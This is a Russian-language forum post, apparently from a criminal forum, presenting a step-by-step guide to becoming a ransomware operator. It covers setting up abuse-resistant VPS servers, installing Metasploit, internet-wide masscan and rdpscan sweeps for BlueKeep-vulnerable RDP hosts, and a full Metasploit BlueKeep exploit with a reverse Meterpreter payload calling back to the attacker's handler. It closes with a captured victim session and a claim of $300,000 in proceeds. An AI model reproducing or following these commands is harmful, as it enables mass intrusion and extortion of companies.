Эти инструкции очень полезны, легко последоватьКак заработать от 1к до 100к баксов за месяц почти без вложений?
Привет коммуннити! Сегодня я расскажу вам как стать рансомварщиками, практически без вложений.
Мы будем добывать точки входа в мелкие и средние компании, при помощи metasploit при этом вложив 100 баксов в покупку лишь 2 х vps
Что нужно:
2 vps сервера на Ubuntu (желательно абузоустойчивые топовая конфигурация будет не нужна поэтому 100 баксов вам должно хватить)
PS вы можете взять любую другую OS я буду описывать настройку именно на убунту
Intro первоначальная настройка впс для работы с метой
У нас есть чистая ubuntu
нактим xrdp + xfce оболочку (мне так удобней вы можете взамидействоать с сервером п ssh)
Обновим пакеты
sudo apt-get update
Накатим xrdp для работы через терминальные сессии
sudo apt-get install xrdp
Установим облочку xfce можно поставить mate например (но стабильней всего с терминальным серверовм работает именно xfce)
sudo apt-get install xfce4 xfce4-terminal
Разрешим xrdp исользовать эту оболчку
sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh
Включаем xrpd
Сорян ошибки граматики пунктуации и синтаксиса писал на колонке ничего не редактируя, если кто то захочет дополнить или записать видео по этой теме закину 50-100 баксов для мотивации)
sudo systemctl enable xrdp
Done теперь вы можете работать с сервером через терминальную сессию
поставим удобный текстовый редактор gedit
sudo apt-get install gedit
Поставим htop для мониторинга загруженности системы
sudo apt-get install htop
Установка metasploit, БД к нему подтягивать не будем она не понадобиться
качаем метасплойт курлом или wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
даем права chmod 755 msfinstall
sudo ./msfinstall
Теперь при наборе msfconsole в шелле метасплойт запуститься.
II выбор RCE и подготовка материала
Добывать свой хлеб мы будем данной уязвимостью
xttps://en.wikipedia.org/wiki/BlueKeep
в метасплойте есть rce для него
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Данное rce для протокола rdp оно крайне не стабильно, но приносит хорошие доступы)
С RCE мы определились
теперь нам нужен материал, то есть уязвимые машины в клирнете под блюкип
В идеале если у вас будут подсети с maxmaind и софт для пентеста от z668, он нужен исключительно для чека на RDP сервис дабы не тратить время и пропускать порты все что не относиться к рдп
лучше всего сканировать рандомные TCP порты и потом проверять их на сервис рдп
Я покажу на примере стандандартного 3389 порта
Установим еще 2 софта для сканирования портов (masscan) и rdpscan для проверку на узвимый bluekeep
ставим все не обходимое для работы массканаsudo apt-get install git gcc make libpcap-dev
затягиваем сорсы к себеgit clone https://github.com/robertdavidgraham/masscan
переходим в каталог с массканом cd masscan
собираем в многопотокеmake -j
Качаем бесплатно либо покупаем депы IP адресов
masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
данные параметры возьмут депы из фаила res4.txt просканируют порт 3389 с рейтом 100 000 исключая 255.255.255.255 подсеть
awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt
выдаст чистые результаты IP с output фаила масскана
Ставим сканер на уязвимость блюкип и все необходимо для его работы
sudo apt-get install libssl-dev sudo apt-get install build-essential
git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
компилируемmake -j
Запуск сканера
./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt
--workers 500 (количество воркеров стоит отписальное количество зависит от вашей конфигурации сервера )
--port 3389 порт который сканируем
--file /root/rdpscan/ch2.txt путь до фаила с ипами
grep 'VULN' выбираем только уязвимые и записываем в фаил >results.txt
III получаем доступы
Я буду использовать стандартный пейлоад метасплойта для закрепления, можно ипользовать кобальт страйк или любую другую систему пост эксплуатации но статья расчитана на тех у кого нет нихуя даже кряка, будем использовать метерперетер
и так запускаем метасплойт
msfconsole
И сразу открываем второе окно терминала и там опять запускаем метасплойт
В первом окне делаем handler (туда будут лететь сессии отдельным окном)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp_rc4(выбираем пелоад реверс (когда цель подключаеться к нам) с шифрованием )
set EXITFUNC thread
EXITFUNC есть 3 разных значения: thread, process, seh
мы используем thread он используеться почти везде и работает достаточно хорошо
запускает шелл-код в подпотоке, и выход из этого потока приводит к рабочему приложению / системе.
set LHOSTхост нашей впс
set LPORTпорт где будет висит слушатель
set RC4PASSWORD PASSS( пароль для RC4)
set ExitOnSession 0(данный параметр будет держать сессию всегда онлайн (тоесть не будет слипа может привести к быстрому спаливанию))
setg SessionLogging yвключить логирование
setg loglevel 1уровень логирования
run -jзапуск
хэндлер готов и ожидает коннектов
переходим во второе окно
Bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp_rc4
set EXITFUNC thread
set DisablePayloadHandler 1(обязтаельно 1 что бы сесия летела в отдельное окно)
set LHOST ип впс
set LPORTпорт (указывать такой же как и в хэндлере)
set RC4PASSWORD PASSS(пароль такой же как в хэндлере)
set ConnectTimeout 5(таймаут)
set GROOMSIZE 100(количество мегабайт которыми будет заспамливаться хост играйтесь с парметрами от 100 до 250 ) всегда будут прилетать разные машины
set GROOMCHANNELCOUNT 1
set forceexploit 1исполнять принудетельно
set target 1(дефолтный таргет тут менять ничего не нужно )
set rhosts file:/root/rdpscan/4.txt(путь до фаила с уязмимыми машинами)
set RPORT(если вы используете не старндартый порт для RDP если 3389 то его можно не указывать он стоит по дефолту)
run- запуск
через какое то время в хендлер полетят сесии
Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows
Вам остается только закрепляться и отбирать доступы)
Enjoy
c Апреля по по Июль я заработал блюкипом около 300.000 USD чистыми деньгами, таким способом можно поймать
компании с ревеню до 100 миллонов,
тем самым поучиться пентесту не покупая мат, в этой теме вы можете задавать вопросы